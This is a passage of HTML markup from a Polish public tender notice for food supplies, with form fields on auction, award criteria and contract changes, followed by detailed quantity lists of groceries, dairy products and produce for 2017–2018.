id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja wieloetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"></span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.W trakcie trwania umowy mogą ulec zmianie następujące postanowienia umowne:1)w przypadku zmiany stawki podatku VAT na artykuły będące przedmiotem niniejszego zamówienia, ceny poszczególnych artykułów ulegną zmianie zgodnie ze zmianą stawki podatku;2)dopuszcza się zmiany cen produktów stanowiących przedmiot zamówienia w oparciu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych określony przez GUS w Białymstoku, dotyczących cen przedmiotu zamówienia. Nowa cena obowiązuje od dnia podpisania aneksu do umowy, z zastrzeżeniem, że waloryzacja nie może nastąpić częściej niż raz w miesiącu;3)w przypadku obniżenia cen rynkowych produktów należących do asortymentu objętego umową ceny zostaną odpowiednio zmniejszone, po udokumentowaniu przez Zamawiającego,4)siły wyższej.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-06-13</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08.30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>artykuły spożywcze- ogólne</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Ananas puszka nie mniejszy niż 565g-400 szt 2.Bazylia nie mniejsza niż 10g-300 szt; 3.Baton typu Kinder bueno lub równoważny nie mniejszy niż 43g-2 000 szt.; 4.Baton typu twix lub równoważny nie mniejszy niż 51g-2 000 szt; 5.Baton typu Lion lub równoważny nie mniejszy niż 43g-1 000 szt.;6.Baton typu Milky Way lub równoważny-2 000 szt.; 7.Baton sante-7 000 szt; 8.Baton typu Snickers lub równoważny nie mniejszy niż 51g-2 000 szt.; 9.Baton typu Nestle Cini Minis lub równoważny nie mniejszy niż 25g-2 000 szt.; 10.Bomboniera Toffifee lub równoważny nie mniejszy 125g-800 szt.; 11.Brzoskwinie w syropie nie mniejsze niż 850 ml-100 szt.; 12.Chrzan nie mniejszy niż 290g-200 szt.; 13.Ciastka typu Pieguski lub równoważne nie mniejsze niż 135 g-1 500 szt.; 14.Ciastka sante-9 000 szt; 15.Cebula prażona-60kg; 16.Cukier nie mniejszy niż 1 kg-2 500 kg; 17.Cukier trzcinowy-2 500 kg; 18.Cukier puder nie mniejszy niż 400g-100 szt.; 19.Cukier wanilinowy nie mniejszy niż 32g-100 szt.; 20.Cynamon mielony nie mniejszy niż 15g-50 szt.; 21.Czekolada typu Alpen Gold lub równoważna nie mniejsza niż 100g-2 000 szt.; 22.Czekolada tylu goplana lub równoważna nie mniejsza niż 100g-2 000 szt.; 23.Czekolada typu Wedel lub równoważna nie mniejsza niż 100g-2 000 szt.; 24.Czekolada typu Baron lub równoważna nie mniejsza niż 100g-2 000 szt.; 25.Czekolada gorzka nie mniejsza niż 100g-2 000 szt; 26.Czosnek płatek nie mniejszy niż 450g-100 szt; 27.Czosnek granulowany nie mniejszy niż 16g-200 szt.; 28.Curry nie mniejsze niż 10g-200szt; 29.Delikat do drobiu typu Knorr lub równoważny nie mniejszy niż 600g-50 szt.; 30.Delikat do mięs typu Knorr lub równoważny nie mniejszy niż 700g-50 szt.; 31.Groszek konserwowy nie mniejszy niż 400g typu Vinegret lub równoważny-350 szt.; 32.Herbata typu Lipton lub równoważna saszetki 100x2g-300 szt.; 33.Herbata granulowana typu Lipton lub równoważna nie mniejsza niż 100 g-100 szt.; 34.Herbata liściasta typu Lipton lub równoważna nie mniejsza niż 100g-100 szt.; 35.Herbatniki typu Jeżyki lub równoważne nie mniejsze niż 140g-3 000 szt.; 36.Jajka typu Kinder lub równoważne nie mniejsze niż 20g-2 500 szt.; 37.Kasza gryczana nie mniejsza niż 500g-200 szt.; 38.Kasza jęczmienna gruboziarnista, średnia nie mniejsza niż 500g-200 szt.; 39.Kasza jęczmienna drobnoziarnista nie mniejsza niż 500g-200szt.; 40.Kasza jęczmienna pęczak nie mniejsza niż 500g-500 szt.; 41.Kasza manna nie mniejsza niż 500g-60 szt.; 42.Kasza jaglana nie mniejsza niż 500g-600 kg; 43.Kasza orkiszowa nie mniejsza niż 500g-200 kg;44.Kasza gryczana niepalona nie mniejsza niż 500g-800kg; 45.Ketchup ł/p nie mniejszy niż 480g skład: pomidory (198 g na 100 g ketchupu), cukier, ocet, sól, skrobia modyfikowana, aromat naturalny. Produkt może zawierać seler.-300 szt.; 46.Koncentrat buraczany nie mniejszy niż 300ml typu Krakus lub równoważny-20 l; 47.Koncentrat pomidorowy nie mniejszy niż 1 kg skład: koncentrat pomidorowy wyprodukowany ze świeżych pomidorów, bez żadnych dodatków.-100 kg; 48.Kukurydza konserwowa nie mniejsza niż 425g typu Vernet lub równoważny-200 szt.; 49.Kwasek cytrynowy nie mniejszy niż 20g-400 szt.; 50.Liść laurowy nie mniejszy niż 10g-300 szt.; 51.Liść lubczyku nie mniejszy niż 10g-300 szt.; 52.Liść laurowy nie mniejszy niż 12g-200 szt.; 53.Liść laurowy nie mniejszy niż 5g-200 szt.; 54.Lizak typu Chupa Chups lub równoważny-2 000 szt.; 55.Majeranek nie mniejszy niż 10g-80 szt.; 56.Majeranek nie mniejszy niż 20g-300 szt.; 57.Majonez skład: olej roślinny, żółtko jaja 6%, ocet, musztarda (woda, gorczyca, ocet, sól, cukier, przyprawy), cukier, sól, przyprawy, przeciutleniacz E385, regulator kwasowości: kwas cytrynowy.-1000 szt.; 58.Makaron kolanka nie mniejszy niż 1 kg typu Barilla lub równoważny skład: semolina z pszenicy durum, woda-2 000 kg; 59.Makaron spaghetti nie mniejszy niż 1 kg typu Barilla lub równoważny skład: semolina z pszenicy durum, woda-800 kg; 60.Makaron świder nie mniejszy niż 1 kg typu Barilla lub równoważny skład: semolina z pszenicy durum, woda-400 kg; 61.Makaron razowy nie mniejszy niż 1kg-6 000kg; 62.Mąka luksusowa nie mniejsza niż 1 kg-400 kg; 63.Mąka razowa nie mniejsza niż 1 kg-500 kg; 64.Mąka orkiszowa nie mniejsza niż 1 kg-500 kg.; 65.Mąka żytnia nie mniejsza niż 1 kg-500 kg.; 66.Mąka tortowa nie mniejsza niż 1 kg-400 kg; 67.Mąka ziemniaczana nie mniejsza niż 1 kg-200 kg; 68.Miód pasieka wielokwiatowy nie mniejszy niż 400g-70 kg; 69.Mieszanka warzywna nie mniejsza niż 100g skład: cebula suszona płatki, marchew kostka, pasternak kostka, por kostka-200 szt.; 70.Musztarda chrzanowa nie mniejsza niż 190g typu Agrovita lub równoważna-400 szt.; 71.Ogórek konserwowy nie mniejszy niż 900 ml-800 szt.; 72.Olej nie mniejszy niż 1l typu Kujawski lub równoważny-600 szt.; 73.Ocet spirytusowy 10% nie mniejszy niż 500 ml-50 szt.; 74.Ocet winny-60szt.; 75.Oregano nie mniejsze niż 10g-100 szt.;76.Papryka słodka nie mniejsza niż 10g-100 szt; 77.Papryka ostra nie mniejsza niż 10g-100 szt; 78.Pęcak nie mniejszy niż 1kg-500kg; 79.Pieprz cytrynowy mielony nie mniejszy niż 20g typu Prymat lub równoważny-400szt.; 80.Pieprz naturalny mielony nie mniejszy niż 20g typu Prymat lub równoważny-580 szt.; 81.Pieprz naturalny mielony biały nie mniejszy niż 20g typu Prymat lub równoważny skład: gorczyca biała, kolendra, papryka ostra, kminek, majeranek, czosnek i kozieradka-800szt; 82.Pieprz ziołowy mielony nie mniejszy niż 15g typu Prymat lub równoważny skład: gorczyca biała, kolendra, papryka ostra, kminek, majeranek, czosnek i kozieradka-800 szt.; 83.Płatki owsiane nie mniejsze niż 500g-100 szt.; 84.Przecier ogórkowy nie mniejszy niż 300g-300 szt.; 85.Przyprawa do mięs typu Vegeta nie mniejsze niż 75g skład:suszone warzywa 44,6%,( papryka słodka, cebula, pomidory, czosnek,, papryka ostra, natka pietruszki), sól, cukier, przyprawy 6,3% ( rozmaryn, oregano, pieprz czarny, majeranek, tymianek)-200 szt.; 86.Przyprawa do mięs i grilla nie mniejsza niż 1,1 kg typu maggi lub równoważna-30 szt.; 87.Przyprawa 18 ziół Ojca Mateusza skład: papryka słodka, majeranek, czosnek, bazylia, kolendra, pieprz czarny, lubczyk, gorczyca, kurkuma, imbir, kminek, oregano, tymianek, papryka chili, pieprz zielony, liscie laurowe, rozmaryn-200 szt.; 88.Przyprawa do sałatek nie mniejsza niż 300g skład: cebula mielona, cukier, czosnek granulowany, kwasek cytrynowy, gorczyca mielona, papryka słodka, rozmaryn m ielony, pieprz czarny mielony, koper igła, oregano, pietruszka zielona, majeranek-100 szt.; 89.Przyprawa do kurczaka złocista typu Kamis skład: sól, papryka słodka 14%, gorczyca biala, czosnek 5,8%, kolendra, kurkuma, kozieradka 2,4%, chili 2%, imbir, cynamon, kmin rzymski, goździki, mleko, zboża zawierające gluten i jaja.-100 szt.; 90.Przyprawa ojca Mateusza do drobiu skład: czosnek, cebula, papryka słodka, pietruszka natka, pieprz czarny, kolendra, pieprz Cayenne, tymianek, oregano, imbir, majeranek, kurkuma, jałowiec, ziele angielskie,cząber, kminek, rozmaryn, liść laurowy-100 szt.; 91.Przyprawa naturalna nie mniejsza niż 150g skład: pasternak grys, marchew grys, seler grys, pietruszka zielona, por grys, lubczyk, kurkuma, curry, czosnek granulowany, cebula grys, pieprz czarny mielony-100 szt; 92.Przyprawa do mięsa mielonego nie mniejsza niż 20g-200 szt.; 93.Przyprawa do mięsa mielonego nie mniejsza niż 30g typu prymat skład: sól, papryka słodka, czosnek, kolendra, gorczyca biała, cebula, majeranek, marchew, pieprz czarny, tymianek, chili, rozmaryn, ziele angielskie -280 szt.; 94.Przyprawa do ryb typu Prymat lub równoważna nie mniejsza niż 20g skład: sól, warzywa suszone (natka pietruszki, cebula, czosnek), przyprawy (gorczyca, papryka słodka, kolendra, bazylia, korzeń lubczyka, tymianek, nasiona kopru, pieprz czarny, kozieradka), cukier.-80 szt.; 95.Przyprawa typu Jarzynka lub równoważna nie mniejsza niż 2,8 kg-120 szt.; 96.Przyprawa prowansalska nie mniejsza niż 10g-300 szt.; 97.Przyprawa sypka nie mniejsza niż 1 kg typu Vegetta lub równoważna-500 kg; 98.Przyprawa typu Vegeta lub równoważna 200g-300 szt.; 99.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza 200g-500 szt.; 100.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza niż 960 ml-40 szt.; 101.Pulpa pomidorowa nie mniejsza niż 3kg-30 szt.; 102.Rodzynki nie mniejsze niż 150g-50 szt.; 103.Rogalik typu Chipita 7 days lub równoważny nie mniejszy niż 65g-4 000 szt.; 104.Rosół drobiowy typu Winiary lub równoważny nie mniejszy niż 2,2 kg-30 kg; 105.Ryż biały typu Sonko lub równoważny nie mniejszy niż 1 kg-500 kg; 106.Sekret szefa drobiowy typu Maggi lub równoważny nie mniejszy niż 800 g-20 kg; 107.Sekret szefa grzybowy typu Maggi lub równoważny nie mniejszy niż 650g-15 kg; 108.Sekret szefa typu Maggi lub równoważny wołowy nie mniejszy niż 900g-25 kg; 109.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1 kg-30 kg; 110.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1,1 kg-30 kg; 111.Sos demi glace typu Winiary lub równoważny nie mniejszy niż 900 g-30 kg; 112.Sos grzyby leśne typu Winiary lub równoważny nie mniejszy niż 900g-30 kg; 113.Sos myśliwski typu Winiary lub równoważny nie mniejszy niż 900 g-30 kg; 114.Sos pieczeniowy typu Winiary lub równoważny nie mniejszy niż 1,1 kg-35 kg; 115.Sos sałatkowy typu Winiary lub równoważny nie mniejszy niż 900 g-30 kg; 116.Sos spaghetti typu pudliszki lub równoważny nie mniejszy niż 350 ml skład: pomidory (140 g pomidorów (w przeliczeniu na produkt świeży) w 100 g produktu), warzywa (cebula, marchew), cukier, sól, olej rzepakowy, zioła, przyprawy, regulator kwasowości (kwas cytrynowy), czosnek.-	140 l ;117.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 520 ml-120 l; 118.Sól jodowana drobna typu Cenos lub równoważna nie mniejsza niż 1 kg-700 kg; 119.Sól niskosodowa nie mniejsza niż 1kg drobna-700 kg; 120.Syrop mix typu Herbapol lub równoważny nie mniejszy niż 420 ml-1 000 szt.; 121.Syrop mix typu Paola lub równoważny nie mniejszy niż 430 ml-1 000 szt.; 122.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 300g-400 szt.; 123.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 900g-100 szt.; 124.Tymianek nie mniejszy niż 10g-400szt; 125.Wafel typu Pronce Polo XXL lub równoważny 52g-1 000 szt.; 126.Zając wielkanocny 30g-800 szt.; 127.Ziele angielskie nie mniejsze niż 15 g-900 szt.; 128.Zupa barszcz biały typu Winiary lub równoważna nie mniejsza niż 900 g-70 szt.; 129.Zupa borowikowa typu Winiary lub równoważna nie mniejsza niż 900g-40 szt.; 130.Zupa cebulowa typu Winiary lub równoważna nie mniejsza 900g-30 szt.; 131.Zupa ogonowa typu Winiary lub równoważna nie mniejsza niż 900g-80 szt.; 132.Zupa żurek typu Winiary lub równoważna nie mniejsza niż 900g-30 szt.; 133.Zestaw świąteczny 145g-1 000 szt.; 134.Zakwas do zupy żurek-500szt.;135.Żurawina 200g-200 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15800000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-09-01<br/>data zakończenia: 2018-08-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>nabiał</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Drożdże świeże nie mniejsze niż 100g-200 szt.; 2.Jogurt polski pitny różne smaki nie mniejszy niż 400g-1 000 szt.; 3.Jogurt polski pitny różne smaki nie mniejszy niż 250g-1 000 szt.; 4.Jogurt naturalny nie mniejszy niż 400g-1 000 szt; 5.Jogurt grecki nie mniejszy niż 400g-1 000 szt; 6.Masło śmietankowe nie mniejsze niż 200g zawartość tłuszczu 73%-500 szt.; 7.Masło ekstra nie mniejsze niż 200g zawartość tłuszczu 82%-500 szt.; 8.Masło typu Łaciate nie mniejsze niż 200g zawartość tłuszczu 83%-500 szt.; 9.Mleko 3/2% UHT w kartonie, nie mniejsze niż 1l-500 szt.; 10.Mleko UHT typu Twój kubek 2% w kartonie, nie mniejsze niż 1l-200 szt.; 11.Ser żółty typu Gouda lub równoważny-250 kg; 12.Śmietana do sosów i zup nie mniejsza niż 200ml-500 szt.; 13.Śmietana gęsta 18% nie mniejsza niż 400 ml-3 000 szt.; 14.Śmietana 18% nie mniejsza niż 400ml-3 000 szt; 15.Twaróg mielony w wiadrze nie mniejszy niż 1 kg-100 kg; 16.Twaróg półtłusty krajanka typu Mlekovita-500 kg.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15500000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-09-01<br/>data zakończenia: 2018-08-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Warzywa,owoce i jaja</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Banan-2 000 kg; 2.Bazylia świeża-100 szt; 3.Brzoskwinia-2 000 kg; 4.Burak-2 000 kg; 5.Cebula -1 000 kg; 